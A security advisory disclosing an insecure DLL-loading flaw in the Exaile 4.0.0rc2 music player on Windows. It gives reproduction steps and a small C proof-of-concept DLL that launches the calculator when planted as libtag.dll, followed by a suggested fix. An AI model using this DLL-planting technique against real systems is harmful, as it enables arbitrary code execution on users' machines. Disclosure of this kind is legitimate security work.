Document Title: =============== Exaile 4.0.0rc2 - Insecure DLL/Remote Code Execution Product & Service Introduction: =============================== Exaile is a music player with a simple interface and powerful music management features. Features include automatic album art retrieval, lyrics retrieval, Internet radio broadcasting, tabbed playlists, smart playlists with extensive filtering / search functions, and more. (Copy of the Vendor Homepage: https://www.exaile.org/) Date of Discovery: ================== 2018-09-24 Exploitation Technique: ======================= Local & Remote Platfom Tested: =============== Windows 7 & 10 Technical Details & Description: ================================ A local Insecure DLL has been discovered in the official Exaile v4.0.0rc2 software. The Exaile software does not verify the validation of the certificate in the named file "libtag.dll" which allows the execution of the arbitrary code. Vulnerable Software: [+] Exaile Vulnerable version(s): [+] 4.0.0rc2 Affected Libraries: [+] libtag.dll Proof of Concept (PoC): ======================= For a demonstration of security or to replicate the execution of the arbitrary code, follow the information provided and the steps below to continue. Manual steps to reproduce the local vulnerability ... 1. Compile dll 2. Rename the dynamic link library to libtag.dll 3. Go to the "C:\Program Files\Exaile" folder and look for the DLL named "libtag.dll" 4. Rename the original DLL "libtag.dll" to "libtag1.dll" 5. Place your malicious DLL in the "C:\Program Files\Exaile" directory and rename it to "libtag.dll" 6. Launch exaile.exe 7. Now the calculator executes! -- PoC Exploit -- #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void HrCreateConverter() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } Solution – Fix & Patch: ======================= Verify the validation of the certificate in libtag.dll before loading it. If the certificate is missing or invalid, it will simply not be loaded and Exaile will not be able to execute. Verifying the DLL certificate makes hacking more difficult. Disclaimer: =========== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Copyright © 2018 | ZwX - Security Researcher (Software & web application)